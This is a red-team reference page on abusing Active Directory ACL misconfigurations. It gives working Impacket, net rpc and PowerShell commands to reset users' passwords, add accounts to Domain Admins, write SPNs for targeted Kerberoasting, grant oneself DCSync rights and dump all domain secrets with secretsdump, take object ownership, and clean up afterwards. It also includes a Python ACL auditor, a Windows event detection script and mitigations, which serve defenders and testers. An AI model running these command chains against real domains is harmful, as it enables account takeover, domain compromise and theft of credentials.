ACL Abuse

Overview

Every Active Directory object carries a security descriptor whose DACL is a list of ACEs granting principals rights over that object. Misconfigured or over-delegated ACEs let a low-privileged principal (directly, or through a group it belongs to) modify high-privileged objects: resetting passwords, adding group members, writing SPNs, granting itself DCSync rights, or taking ownership. BloodHound is the primary tool for identifying exploitable ACL paths. The key permissions to look for, under the edge names BloodHound uses, are GenericAll, GenericWrite, WriteOwner, WriteDACL, ForceChangePassword and AddMember; AllExtendedRights on a user or on the domain root is abused the same way as ForceChangePassword and DCSync respectively.

ATT&CK Mapping

  • Tactic: TA0003 - Persistence / TA0004 - Privilege Escalation
  • Technique: T1098 - Account Manipulation
  • Related: T1003.006 - OS Credential Dumping: DCSync (for the WriteDACL-to-DCSync path)

Prerequisites

  • Valid domain credentials
  • Exploitable ACL misconfiguration (identified via BloodHound or manual enumeration)

Techniques

Dangerous ACL Permissions

Permission            What It Allows
GenericAll            Full control: reset the password, modify group membership, write SPNs, write msDS-KeyCredentialLink, edit the DACL and the owner. Implies every right below.
GenericWrite          Write any non-protected attribute: add an SPN (targeted Kerberoast), modify the logon script, write msDS-KeyCredentialLink (shadow credentials)
WriteOwner            Take ownership of the object; the owner implicitly holds WriteDACL, so you can then grant yourself full control
WriteDACL             Modify the DACL: grant yourself any permission, including the replication rights DCSync needs when the object is the domain root
ForceChangePassword   Reset the user's password without knowing the current one (the User-Force-Change-Password extended right; also covered by AllExtendedRights)
AddMember             Write the group's member attribute (WriteProperty on member, on group objects); the weaker AddSelf (Self-Membership validated write) only lets you add your own account

GenericAll on User

# Reset the user's password (no old password needed; the real user loses access, so this is noisy)
# Impacket
# https://github.com/fortra/impacket
impacket-changepasswd '<domain>/<target_user>@<dc_ip>' -newpass '<new_password>' -reset -altuser '<domain>/<attacker>' -altpass '<password>'

# Or, without touching the password: targeted Kerberoasting. Write an SPN onto the user,
# request a service ticket for it, crack the hash offline, then remove the SPN.
# Set the SPN (AD PowerShell module; any LDAP write to servicePrincipalName works)
Set-ADUser -Identity <target_user> -ServicePrincipalNames @{Add='<service>/<fake_host>'}
# Request the ticket for the now-roastable user (output is in hashcat/john format)
# Impacket
# https://github.com/fortra/impacket
impacket-GetUserSPNs '<domain>/<attacker>:<password>' -dc-ip <dc_ip> -request-user <target_user>
# Remove the SPN afterwards
Set-ADUser -Identity <target_user> -ServicePrincipalNames @{Remove='<service>/<fake_host>'}
# targetedKerberoast (https://github.com/ShutdownRepo/targetedKerberoast) automates the set/request/remove cycle

GenericAll / AddMember on Group

# Add a member (e.g., yourself) to the group over SAMR
net rpc group addmem '<group>' '<user>' -U '<domain>/<attacker>%<password>' -S <dc_ip>
# PowerShell (AD module; runs as the current logon, or pass -Credential)
Add-ADGroupMember -Identity "Domain Admins" -Members <attacker>
# Note: the new membership is only in a token issued after the next logon, and protected groups
# (Domain Admins, etc.) have their DACL re-stamped from AdminSDHolder by SDProp every 60 minutes,
# so an ACE planted on such a group is reverted; the membership change itself persists.

ForceChangePassword

# Impacket: reset the password remotely (old password not needed)
# https://github.com/fortra/impacket
impacket-changepasswd '<domain>/<target_user>@<dc_ip>' -newpass '<new_password>' -reset -altuser '<domain>/<attacker>' -altpass '<password>'
# PowerShell (AD module)
Set-ADAccountPassword -Identity <target_user> -Reset -NewPassword (ConvertTo-SecureString '<new_password>' -AsPlainText -Force)
# A reset is logged as Event 4724 and locks the real user out of their own account. With only this
# right there is no quieter option; with GenericAll/GenericWrite prefer the SPN route above.

WriteDACL — Grant DCSync Rights

# Requires WriteDACL on the domain root (the naming-context DN passed as -target-dn)
# Impacket: add the DS-Replication-Get-Changes / -All ACEs for your account
# https://github.com/fortra/impacket
impacket-dacledit '<domain>/<attacker>:<password>' -action write -rights DCSync -principal '<attacker>' -target-dn 'DC=domain,DC=local' -dc-ip <dc_ip>

# Then DCSync (each replication request is logged as Event 4662 on the DC you hit)
impacket-secretsdump '<domain>/<attacker>:<password>@<dc_ip>' -just-dc

WriteDACL — Grant GenericAll

# Impacket: grant yourself FullControl over a target (-target takes a sAMAccountName; use -target-dn for any DN)
# https://github.com/fortra/impacket
impacket-dacledit '<domain>/<attacker>:<password>' -action write -rights FullControl -principal '<attacker>' -target '<target_object>' -dc-ip <dc_ip>

WriteOwner — Take Ownership

# Impacket: take ownership of an object
# https://github.com/fortra/impacket
impacket-owneredit '<domain>/<attacker>:<password>' -action write -new-owner '<attacker>' -target '<target_object>' -dc-ip <dc_ip>

# The owner implicitly holds WRITE_DAC (WriteDACL) on the object (unless the DACL carries an
# OWNER RIGHTS ACE), so you can now write an ACE granting yourself FullControl
impacket-dacledit '<domain>/<attacker>:<password>' -action write -rights FullControl -principal '<attacker>' -target '<target_object>' -dc-ip <dc_ip>

Read ACLs

# Impacket — read DACL on an object
# https://github.com/fortra/impacket
impacket-dacledit '<domain>/<user>:<password>' -action read -target '<target_object>' -dc-ip <dc_ip>

# Read owner
impacket-owneredit '<domain>/<user>:<password>' -action read -target '<target_object>' -dc-ip <dc_ip>
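The rights in the permissions table above, the DCSync ACEs that dacledit writes, and the DACL that dacledit -action read prints are all just ACEs inside the object's nTSecurityDescriptor. The following is an added example, not code from this page, Impacket or BloodHound: it parses a raw self-relative security descriptor (the form LDAP returns) and names the abusable ACEs per trustee. The access-mask bits and GUIDs are the documented Windows/AD values; the SIDs and the three sample descriptors are constructed here, not pulled from a real domain.

```python
"""Audit a raw AD security descriptor for the ACL-abuse primitives on this page.
Added example; the SIDs and descriptors below are constructed for illustration."""
import struct
import uuid

# ADS_RIGHTS_ENUM bits as they appear in an AD access mask
DS_WRITE_PROP, DS_CONTROL_ACCESS = 0x20, 0x100
WRITE_DAC, WRITE_OWNER = 0x40000, 0x80000
GENERIC_WRITE, GENERIC_ALL = 0x40000000, 0x10000000
FULL_CONTROL = 0x000F01FF            # what GENERIC_ALL becomes once the DC stores it
ACCESS_ALLOWED_ACE, ACCESS_ALLOWED_OBJECT_ACE = 0x00, 0x05

# Schema attribute / extended-right GUIDs that make a scoped ACE abusable
MEMBER_ATTR = "bf9679c0-0de6-11d0-a285-00aa003049e2"        # member
SPN_ATTR = "f3a64788-5306-11d1-a9c5-0000f80367c1"           # servicePrincipalName
FORCE_CHANGE_PW = "00299570-246d-11d0-a768-00aa006e0529"    # User-Force-Change-Password
REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"   # DS-Replication-Get-Changes
REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION = {REPL_GET_CHANGES: "DS-Replication-Get-Changes",
               REPL_GET_CHANGES_ALL: "DS-Replication-Get-Changes-All"}

def sid_to_str(b):
    rev, n = b[0], b[1]
    subs = struct.unpack_from("<%dI" % n, b, 8)
    return "S-%d-%d" % (rev, int.from_bytes(b[2:8], "big")) + "".join("-%d" % s for s in subs)

def str_to_sid(s):
    p = s.split("-")
    subs = [int(x) for x in p[3:]]
    return (bytes([int(p[1]), len(subs)]) + int(p[2]).to_bytes(6, "big")
            + struct.pack("<%dI" % len(subs), *subs))

def parse_dacl(sd):
    """Yield (trustee SID, access mask, object-type GUID or None) for each allow ACE."""
    off_dacl = struct.unpack_from("<BBHIIII", sd, 0)[6]       # SECURITY_DESCRIPTOR header
    ace_count = struct.unpack_from("<BBHHH", sd, off_dacl)[3]  # ACL header
    pos = off_dacl + 8
    for _ in range(ace_count):
        ace_type, _, ace_size = struct.unpack_from("<BBH", sd, pos)
        mask = struct.unpack_from("<I", sd, pos + 4)[0]
        guid, p = None, pos + 8
        if ace_type == ACCESS_ALLOWED_OBJECT_ACE:
            flags, p = struct.unpack_from("<I", sd, p)[0], p + 4
            if flags & 1:                                      # ACE_OBJECT_TYPE_PRESENT
                guid, p = str(uuid.UUID(bytes_le=sd[p:p + 16])), p + 16
            if flags & 2:                                      # ACE_INHERITED_OBJECT_TYPE_PRESENT
                p += 16
        if ace_type in (ACCESS_ALLOWED_ACE, ACCESS_ALLOWED_OBJECT_ACE):
            yield sid_to_str(sd[p:pos + ace_size]), mask, guid
        pos += ace_size                                        # deny/audit ACEs are skipped

def find_abusable(sd):
    """Map each trustee SID to the edge names (as BloodHound/this page call them) it holds."""
    found = {}
    for sid, mask, guid in parse_dacl(sd):
        r = found.setdefault(sid, set())
        if mask & GENERIC_ALL or (mask & FULL_CONTROL) == FULL_CONTROL:
            r.add("GenericAll")
            continue                                           # everything else is implied
        if mask & WRITE_DAC:
            r.add("WriteDACL")
        if mask & WRITE_OWNER:
            r.add("WriteOwner")
        if mask & GENERIC_WRITE or (mask & DS_WRITE_PROP and guid is None):
            r.add("GenericWrite")                              # every attribute writable
        elif mask & DS_WRITE_PROP:
            r.add({MEMBER_ATTR: "AddMember", SPN_ATTR: "WriteSPN"}.get(guid, "WriteProperty"))
        if mask & DS_CONTROL_ACCESS:
            r.add({None: "AllExtendedRights", FORCE_CHANGE_PW: "ForceChangePassword",
                   **REPLICATION}.get(guid, "ExtendedRight"))
    for r in found.values():                                   # DCSync needs both replication rights
        if set(REPLICATION.values()) <= r:
            r.add("DCSync")
    return found

def build_ace(sid, mask, guid=None):
    """ACCESS_ALLOWED_ACE, or ACCESS_ALLOWED_OBJECT_ACE scoped to one attribute/right."""
    body = struct.pack("<I", mask)
    if guid is not None:
        body += struct.pack("<I", 1) + uuid.UUID(guid).bytes_le   # flags = OBJECT_TYPE_PRESENT
    body += str_to_sid(sid)
    ace_type = ACCESS_ALLOWED_ACE if guid is None else ACCESS_ALLOWED_OBJECT_ACE
    return struct.pack("<BBH", ace_type, 0, 4 + len(body)) + body

def build_sd(aces):
    """Self-relative descriptor carrying only a DACL (owner/group/SACL offsets left 0)."""
    body = b"".join(aces)
    acl = struct.pack("<BBHHH", 4, 0, 8 + len(body), len(aces), 0) + body   # ACL_REVISION_DS
    return struct.pack("<BBHIIII", 1, 0, 0x8004, 0, 0, 0, 20) + acl         # DACL_PRESENT|SELF_RELATIVE

# Constructed SIDs for the example (not real accounts)
HELPDESK = "S-1-5-21-1004336348-1177238915-682003330-1105"
ATTACKER = "S-1-5-21-1004336348-1177238915-682003330-1104"
ENTERPRISE_DCS = "S-1-5-9"

# A user object: helpdesk may reset the password, attacker holds WriteDACL + WriteOwner
USER_SD = build_sd([build_ace(HELPDESK, DS_CONTROL_ACCESS, FORCE_CHANGE_PW),
                    build_ace(ATTACKER, WRITE_DAC | WRITE_OWNER)])
# A group object: helpdesk may write "member"
GROUP_SD = build_sd([build_ace(HELPDESK, DS_WRITE_PROP, MEMBER_ATTR)])
# The domain root: DCs replicate legitimately; attacker was added by dacledit -rights DCSync
DOMAIN_SD = build_sd([build_ace(ENTERPRISE_DCS, DS_CONTROL_ACCESS, g) for g in REPLICATION]
                     + [build_ace(ATTACKER, DS_CONTROL_ACCESS, g) for g in REPLICATION])

if __name__ == "__main__":
    for name, sd in (("user", USER_SD), ("group", GROUP_SD), ("domain root", DOMAIN_SD)):
        for sid, rights in sorted(find_abusable(sd).items()):
            print("%-12s %-48s %s" % (name, sid, ", ".join(sorted(rights))))
```

To run this against a live object, fetch nTSecurityDescriptor over LDAP with the LDAP_SERVER_SD_FLAGS control (OID 1.2.840.113556.1.4.801) set to owner, group and DACL (0x07): a non-admin bind cannot read the SACL part, and without the control the attribute is often not returned at all. The mapping deliberately treats a DS_WRITE_PROP ACE with no object GUID as GenericWrite, because unscoped WriteProperty covers every attribute just as GenericWrite does.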

Cleanup — Remove Added ACEs

# Impacket: remove the ACE you added (same -rights/-principal/-target as the write)
# https://github.com/fortra/impacket
impacket-dacledit '<domain>/<attacker>:<password>' -action remove -rights DCSync -principal '<attacker>' -target-dn 'DC=domain,DC=local' -dc-ip <dc_ip>
# Also remove any FullControl ACE you wrote, hand ownership back to the owner you read before
# the change, and delete any SPN you set. dacledit's -action backup / -action restore can
# snapshot the DACL before editing so the original can be restored exactly.

Detection Methods

Network-Based Detection

  • LDAP modify requests that write nTSecurityDescriptor (DACL or owner) on sensitive objects: the domain root, Domain Admins and other protected groups, AdminSDHolder, DC computer objects
  • LDAP writes to member, servicePrincipalName or msDS-KeyCredentialLink from non-admin accounts
  • SAMR/MS-RPC writes (group member additions, password resets) from non-admin accounts; net rpc and changepasswd -reset do not go over LDAP
  • DRSUAPI replication requests (DsGetNCChanges) from a source that is not a domain controller, the network signature of DCSync

Host-Based Detection

  • Windows Security Event 5136 (Directory Service Object Modified) with AttributeLDAPDisplayName = nTSecurityDescriptor, member, servicePrincipalName or msDS-KeyCredentialLink; requires the "Audit Directory Service Changes" subcategory and a SACL on the objects
  • Event 4662 carrying the replication GUIDs 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 and 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 from any account other than DC computer accounts and known sync accounts (e.g. Azure AD Connect): DCSync
  • Events 4728 / 4756 (member added to a security-enabled global / universal group) for privileged groups, and 4724 (password reset attempted) where the subject is not the target
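Detection logic for the event IDs above, as an added example that is not part of the original page: it runs over constructed Security-log entries in the shape of exported event XML and raises one alert per matching event. The DC and sync-account names, the sensitive DNs and the user names are assumptions for the example; real 4662 events carry the object GUID rather than a DN in ObjectName.

```python
"""Flag ACL-abuse patterns in Windows Security events (5136, 4662, 4728/4756, 4724).
Added example; the environment constants and sample events are constructed."""
import xml.etree.ElementTree as ET

# Extended-right GUIDs that appear in a 4662 "Properties" field during DCSync
DCSYNC_GUIDS = {"1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",    # DS-Replication-Get-Changes
                "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"}    # DS-Replication-Get-Changes-All
# Assumed environment: DC computer accounts and the directory-sync account that
# legitimately replicate; anyone else pulling secrets is an alert
REPLICATION_ALLOWLIST = {"DC01$", "DC02$", "MSOL_a1b2c3d4e5f6"}
SENSITIVE_DN = {"DC=domain,DC=local",
                "CN=Domain Admins,CN=Users,DC=domain,DC=local",
                "CN=AdminSDHolder,CN=System,DC=domain,DC=local"}
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators", "Schema Admins"}
WATCHED_ATTRS = {"nTSecurityDescriptor", "member", "servicePrincipalName", "msDS-KeyCredentialLink"}

def parse_event(xml_text):
    """Flatten a Windows Security event into {'EventID': ..., <Data Name>: <text>, ...}."""
    root = ET.fromstring(xml_text)
    ev = {"EventID": root.findtext(".//EventID")}
    for d in root.iter("Data"):
        ev[d.get("Name")] = (d.text or "").strip()
    return ev

def guids_in(properties):
    """4662 lists rights as '%%7688 {guid} {guid}'; return the bare lower-case GUIDs."""
    return {t.strip("{}").lower() for t in properties.split() if t.startswith("{")}

def detect(ev):
    """Return an alert string if the event matches an ACL-abuse pattern, else None."""
    eid, who = ev["EventID"], ev.get("SubjectUserName", "?")
    if eid == "4662" and guids_in(ev.get("Properties", "")) & DCSYNC_GUIDS:
        if who not in REPLICATION_ALLOWLIST:
            return "DCSync by %s on %s" % (who, ev.get("ObjectName", "?"))
    elif eid == "5136" and ev.get("ObjectDN") in SENSITIVE_DN:
        if ev.get("AttributeLDAPDisplayName") in WATCHED_ATTRS:
            return "%s wrote %s on %s" % (who, ev["AttributeLDAPDisplayName"], ev["ObjectDN"])
    elif eid in ("4728", "4756") and ev.get("TargetUserName") in PRIVILEGED_GROUPS:
        return "%s added %s to %s" % (who, ev.get("MemberName", "?"), ev["TargetUserName"])
    elif eid == "4724" and who != ev.get("TargetUserName"):
        return "password reset of %s by %s" % (ev.get("TargetUserName", "?"), who)
    return None

def scan(events):
    """Run detect() over raw event XML strings and return the alerts in log order."""
    return [a for a in (detect(parse_event(e)) for e in events) if a]

def _event(eid, **data):
    """Build a constructed event in the shape of exported Security-log XML."""
    body = "".join('<Data Name="%s">%s</Data>' % kv for kv in data.items())
    return "<Event><System><EventID>%s</EventID></System><EventData>%s</EventData></Event>" % (eid, body)

# Constructed sample log: one benign replication, then the attack chain from this page
SAMPLE_EVENTS = [
    _event("4662", SubjectUserName="DC02$", ObjectName="DC=domain,DC=local", AccessMask="0x100",
           Properties="%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"),
    _event("5136", SubjectUserName="jsmith", ObjectDN="DC=domain,DC=local",
           AttributeLDAPDisplayName="nTSecurityDescriptor", OperationType="%%14674"),
    _event("4662", SubjectUserName="jsmith", ObjectName="DC=domain,DC=local", AccessMask="0x100",
           Properties="%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"),
    _event("4728", SubjectUserName="jsmith", TargetUserName="Domain Admins",
           MemberName="CN=jsmith,CN=Users,DC=domain,DC=local"),
    _event("4724", SubjectUserName="jsmith", TargetUserName="svc_backup"),
    _event("5136", SubjectUserName="jsmith", ObjectDN="OU=Workstations,DC=domain,DC=local",
           AttributeLDAPDisplayName="description", OperationType="%%14674"),
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print("ALERT:", alert)
```

None of these events exist unless the matching audit subcategories are enabled and, for 5136 and 4662, a SACL is set on the objects; the replication allowlist must include every legitimate DCSync consumer (all DC computer accounts plus Azure AD Connect or similar sync accounts) or the rule will page on every replication cycle.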

Mitigation Strategies

  • Audit ACLs regularly: use BloodHound, ADExplorer or Get-Acl against the AD: drive to find paths from low-privileged principals to Tier 0 objects, and remove the offending ACE at its source rather than only the exposed path
  • Remove unnecessary permissions: follow least privilege for AD object permissions and delegate through dedicated groups with narrowly scoped rights (e.g. ResetPassword on one OU) instead of GenericAll
  • Monitor DACL changes: alert on nTSecurityDescriptor modifications to sensitive objects (Domain Admins and other protected groups, DC computer objects, domain root, AdminSDHolder)
  • AdminSDHolder: SDProp copies the AdminSDHolder DACL onto every protected user and group every 60 minutes, so an ACE planted on AdminSDHolder itself propagates to all of them; audit that object's DACL and restrict who can write it

References

Official Documentation

  • Impacket: https://github.com/fortra/impacket

MITRE ATT&CK

  • T1098 - Account Manipulation: https://attack.mitre.org/techniques/T1098/